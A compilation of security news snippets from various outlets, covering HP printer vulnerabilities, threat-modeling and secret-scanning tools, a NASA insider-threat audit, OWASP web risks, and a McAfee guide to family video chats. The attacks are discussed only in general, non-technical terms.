HP has published various security alerts for more than 250 of its printer models. Hackers should be able to inject malicious code, denial-of-service (DoS) attacks to start and access data. As a countermeasure, the manufacturer recommends firmware updates and configuration changes.

Gateway LLMNR protocol

The first vulnerability, CVE-2022-3942, is classified as critical with a value of 8.4. According to Heise, attackers can use vulnerabilities in the firmware to remotely cause a buffer overflow in around 250 HP printer models. Malicious code can then be injected and executed.

To read this article in full, please click here

Read More

IriusRisk has launched a new Open Threat Model (OTM) standard to allow greater connectivity and interoperability between threat modeling and other parts of the software development lifecycle (SDLC). The OTM standard has been published under a Creative Commons license and provides a tool-agnostic way of describing a threat model in a simple to use and understand format, IriusRisk said.

The standard can leverage a wide range of source formats and supports new sources of application and system design, whilst also allowing users to exchange threat model data within the SDLC and cybersecurity ecosystem. An accompanying API allows users to provide an OTM file which IriusRisk uses to build a full threat model using the rules engine, which contains an extensive library of components and risk patterns.

To read this article in full, please click here

Read More

IBM’s new Unified Key Orchestrator lets customers integrate multiple security key-management systems into a single managed service that spans hybrid and multicloud environments.

Read More

Comcast is releasing a new software tool, xGitGuard, as an open source project to the community at large. The tool is designed to proactively search the open source repositories of GitHub for code that was supposed to remain proprietary.

The idea behind xGitGuard is to provide an automated method of checking through GitHub repositories for code that shouldn’t be there — an important consideration for modern development teams, given the increasing usage of open source code. The tool uses NLP (natural language processing) technology, AI modeling and other advanced techniques to programmatically identify and validate secret code on GitHub, as well as identifying which developer accounts posted those secrets.

To read this article in full, please click here

Read More

Editor’s Note: This is the third in a series of articles about how we can help our elder parents get the most out of digital life—the ways we can help them look after their finances and health online, along with how they can use the internet to keep connected with friends and family, all safely and simply. 

Now here’s a great topic. Spending more quality time with our folks, even if they’re far away. That’s the beauty of a family video chat. It’s a way to connect with more than voice. It’s a way to share moments together. 

If your parents and the older loved ones in your family haven’t come around to the idea of video chats just yet, now’s a good time to give it a try. Video chats are far easier to enjoy than ever, and with a little initiative from you, the family can gather around a video chat rather quickly. In fact, there’s plenty you can do to get them started.  

Video chats may be old hat to you, but it’s likely quite new to them 

Clearly, a video chat is different than a phone call. Beyond the technological differences, it’s quite a different way of interacting. After all, there you are, face-to-face, talking over a device. And that may feel a little awkward, especially for our parents. They’ve lived lives where long-distance conversations meant using a phone that was anchored to the kitchen wall. 

So aside from the technical considerations of video chats, there’s a degree of freedom that may leave our parents wondering what to do and how to act in this new medium. Just like when we first used video chat ourselves, questions come up … Where should I be looking on the screen … How should I hold the phone … Can everyone on this call see up my nose? 

You can ease them in by taking the lead, welcoming them into the notion that your video chat can be much more than a phone call. More than simply talking, it’s a chance to create a shared space together.  

A great example is this: a co-worker recently told me about his in-laws who were scouting out retirement communities to live in. Even though his in-laws lived 2,000 miles away, they all got to do a little house-hunting together. Using a smartphone, they took room-to-room tours of model homes together, got views of the tree-lined streets, checked out the pools and rec centers, and so on. A few weeks later, they shared another video call where his in-laws walked the family through their new place after they’d settled in. And all of it started with a simple request, “Hey, turn on FaceTime so we can take a look too!” 

So, in a way, video chats truly are an opportunity to create moments together. It could be as simple as asking grandma to read a book to the kids, have mom and dad share what they’re having for a birthday dinner, or ask them to show how hard it’s snowing outside their home. Anything you can do to encourage a little free interaction of some sort may make a video chat feel far more comfortable. You can really relax and interact once you settle in and let the possibilities unfold. 

Set a time for your call 

In a way, a video call is much like dropping by the house for a visit. Placing a video call unannounced may catch mom in her curlers, so to speak. Or, as we’ve heard our parents say when they looked at a messy living room, we may catch them when “the house isn’t ready for guests.” In either case, scheduling a time for a video call gives everyone time to prepare. Whether it’s sprucing up your appearance or simply getting into the headspace for a face-to-face interaction, a designated time helps everyone get ready. 

On your end, it’s an opportunity for you to prepare as well. Do the kids have some recent schoolwork or a project they’re proud of? Have them bring it for some show-and-tell. Doing some cooking lately and you just can’t seem to get the family secret BBQ sauce just right? Bring your folks into the kitchen for some cooking advice. Find an old treasure in storage? Break it out and flip through your old grade-school art scrapbook with them on the call. As you prepare, think about sharing and moments, some of the things you’d like to do together over a video call. That’ll make it all the more special. 

Picking a platform for your video call—smartphones and tablets are a straightforward way to go 

As you know, there are plenty ways to hold a video call. There’s a good chance you’ve used several platforms and apps yourself already, whether with friends, work, or a mix of both. So when it comes to picking what’s best for your video call, the question to ask here is what’s your parent’s comfort level with technology. 

If your parents are pretty comfortable with technology, you can share one of my earlier articles on video calls with them, which walks through the ins and outs of different apps and options. If they’re a little less savvy with technology, ideally they have a smartphone or tablet that they can use. Chances are, that device will have video calling built right in, such as Apple’s FaceTime or Google Duo on Android devices—both of which make video calls an easier “point and shoot” experience.  

Even if you’re using different devices, you can still use apps like FaceTime between Androids and iPhones. It’s rather straightforward, as all it takes is for one party or other to click a link. Additionally, Google Duo is available as an app in Apple’s App Store, which makes it easy for everyone to get on one platform as needed. 

Video calls on laptops and computers 

If a smartphone or tablet isn’t in the picture, there are certainly options for laptops and computers, several you may also know well already. Of the free and relatively straightforward apps out there, you can choose from: 

Zoom

With a free account that can run through a browser window, you and your parents can enjoy a call without having to manually download an app. 

Skype

This comes standard on Windows PCs and supports apps for all kinds of tablets and smartphones too. If you want to create a video chat without an account, you can simply visit this page and start an instant video chat with a click.  

Google Meet

Free to anyone with a free Google Gmail account, you can use Google Meet just by clicking its icon from your Google apps menu or by visiting https://meet.google.com/. Like Zoom and Skype, it can run in the window of a browser, so there’s no app to manually download. 

Of course, your folks will need a camera and microphone for their computer. If they don’t have one, there are plenty of moderately priced web cameras that include a microphone. I suggest getting one with a physical lens cap. That way they can protect privacy. Of course, they can always simply disconnect it when they’re not using it. 

Setting up a laptop or computer for video calls may take a little bit of work. You can help your parents by walking them through the process with these articles: 

If they have a Windows computer, you can check out this quick article to get the audio set up and this article for setting up the camera.  
For Macs, check out this article for setting up audio and this article for setting up video. 

Keeping safe on your calls 

Once you’re all set up, here are a few things that you and your parents can do to help keep your calls private and secure.   

1) Set a password 

If your video chap app generates a link that others can click to join in, be sure to create a password that uninvited parties can’t join in as well. Also, don’t be shy about asking your family members to use a password on the calls they initiate. It’s pretty much standard practice nowadays. 

2) Double-check any video chat invitation links 

Likewise, with any chat link that’s sent to you, be sure that link is legitimate. Confirm the link with the family member who sent it, particularly if you weren’t expecting one. (This is another good reason to schedule calls. Family members will be on the lookout for that link.) 

3) Use security software 

Make sure that you’re using comprehensive online protection software that helps steer you clear of scam emails and links, along with browser protection that blocks links that could send you to sketchy websites. That way, if you do get sent a bogus invite link from a scammer, you’ll be protected. 

4) Keep your apps and operating system up to date 

Aside from giving you the latest features and functionality, updates also often include essential security improvements. Set your computer to update itself automatically and consider using security software that will scan for vulnerabilities and install updates automatically as needed. 

Chat it up! 

An interesting closing note is that getting comfortable with video chat may open a world of other possibilities as well. Perhaps once they get online and see how video chats work, they’ll reach out to other friends and them get in on it too, creating more opportunities to reach out and spend time with others. In other words, you may really start something here by getting mom and dad on video chat. 

Additionally, early research has shown that older adults who use regularly technologies like video chat have seen positive impacts in their long-term memory compared to those who just interacted over the phone or in person. Similarly, research has shown that the use of technology, in general, can enhance mental health for older adults as well.  

With that, I hope you’ll give it a try with your parents and older loved ones. Meet the inevitable technical bumps in the road with a smile because this journey will be absolutely worth it. For all of you. 

The post Helping Mom & Dad: Family Video Chats appeared first on McAfee Blog.

Read More

Splunk warns that there’s little time to stop attacks once in progress

Read More

The Office of Inspector General has audited NASA’s insider threat program:

While NASA has a fully operational insider threat program for its classified systems, the vast majority of the Agency’s information technology (IT) systems — including many containing high-value assets or critical infrastructure — are unclassified and are therefore not covered by its current insider threat program. Consequently, the Agency may be facing a higher-than-necessary risk to its unclassified systems and data. While NASA’s exclusion of unclassified systems from its insider threat program is common among federal agencies, adding those systems to a multi-faceted security program could provide an additional level of maturity to the program and better protect agency resources. According to Agency officials, expanding the insider threat program to unclassified systems would benefit the Agency’s cybersecurity posture if incremental improvements, such as focusing on IT systems and people at the most risk, were implemented. However, on-going concerns including staffing challenges, technology resource limitations, and lack of funding to support such an expansion would need to be addressed prior to enhancing the existing program.

Further amplifying the complexities of insider threats are the cross-discipline challenges surrounding cybersecurity expertise. At NASA, responsibilities for unclassified systems are largely shared between the Office of Protective Services and the Office of the Chief Information Officer. In addition, Agency contracts are managed by the Office of Procurement while grants and cooperative agreements are managed by the Office of the Chief Financial Officer. Nonetheless, in our view, mitigating the risk of an insider threat is a team sport in which a comprehensive insider threat risk assessment would allow the Agency to gather key information on weak spots or gaps in administrative processes and cybersecurity. At a time when there is growing concern about the continuing threats of foreign influence, taking the proactive step to conduct a risk assessment to evaluate NASA’s unclassified systems ensures that gaps cannot be exploited in ways that undermine the Agency’s ability to carry out its mission.

Read More

Photos of infants included in misconfigured S3 bucket

Read More

10 Ways organizations make attacks easy

What do cybercriminals love? (Mostly themselves, but that is beside the point.) They love organizations that have unmitigated risks in their web applications and application program interfaces (APIs). With the entire world connected via the internet, the easiest and quickest way for threat actors to infiltrate your systems or steal customer data is through web applications. Basically, everything from the code used to build the application or the API used to connect things to configurations and authentications are fair game.

The top 10 web application security risks cybercriminals love

The areas most often targeted for attack can vary and may change frequently as cybercriminals invent newer and more stealthy ways to worm their way into systems. According to the OWASP, the 2021 Top 10 Web Application Security Risks are:

Broken Access Control
Cryptographic Failures (Sensitive Data Exposure)
Injections (including Cross-site Scripting)
Insecure Design
Security Misconfigurations
Vulnerabilities and Outdated Components
Identification and Authentication Failures
Software and Data Integrity Failures
Security Logging and Monitoring Failures
Server-side Request Forgeries

Most common attack types

Based on the risks listed above, criminals are most likely to employ the following attack types in their bid to infiltrate systems or steal sensitive customer credentials:

Client-side attacks (data breaches and credential compromise)

Client-side attacks include formjacking, credit card skimming, and Magecart attacks. Cybercriminals use client-side attacks to steal information directly from customers or other website users as they input information into websites. Stolen data includes credit card information and personally identifiable information (PII).

Supply chain attacks (JavaScript and software)

According to recent research, supply chain attacks surged by more than 650% over the last year. Threat actors are leveraging existing vulnerabilities in open-source and third-party code or injecting their own malicious scripts into software and JavaScript code to conduct hostile attacks against organizations and industries connected via the supply chain.

Vulnerable application attacks (Unpatched bugs/vulnerabilities and legacy applications)

New bugs and vulnerabilities are discovered on a daily basis and cybercriminals love to exploit them. Equally, criminals are attracted to legacy applications that may contain unpatchable vulnerabilities. Sometimes attackers discover the vulnerabilities before security researchers, and these ‘zero days’ enable application and system compromise often without the organization even knowing it had been attacked. Common attack types that target vulnerabilities include cross-site scripting, injections (JavaScript, SQL, CSS, and HTML).

Automated attacks (Bots and DDoS)

Threat actors use automated techniques, such as botnets and distributed denial of service (DDOS) for attacks that include credential stuffing, content scraping, ticket/product scalping, gift card abuse, and business interruption.

Protect your organization from the risks and attacks that cybercriminals love

There are purpose-built solutions that safeguard organizations, consumers, and internet users from the very things that criminals love to use to their advantage. Two tools that are a part of AT&T Managed Vulnerability Program from Feroot provide client-side application security solutions. These tools are:

Feroot Security PageGuard—Based on the Zero Trust model, PageGuard runs continuously in the background to automatically detect the types of unauthorized scripts and anomalous code behavior found in client-side, application, supply chain and automated attack types. If threats are detected, PageGuard blocks all unauthorized and unwanted behavior in real-time across the organization. PageGuard also automatically applies security configurations and permissions for continuous monitoring of and protection from malicious client-side activities and third-party scripts.

Feroot Security Inspector—In just seconds, Inspector automatically discovers all web assets a company utilizes and reports on their data access. Inspector finds all security vulnerabilities on the client-side and provides specific client-side threat remediation advice to application developers and security teams in real-time.

Next steps

Modern web applications are useful, but they can carry potentially dangerous vulnerabilities and bugs. Protect your customers and your websites and applications from client-side security threats, like Magecart and script attacks with security tools like Feroot’s Inspector and PageGuard. These services offered by AT&T’s Managed Vulnerability Program (MVP) allows the MVP team to inspect and monitor customer web applications for malicious JavaScript code that could jeopardize customer and organization security.

Read More

Microsoft also admits it was hit by ransom group

Read More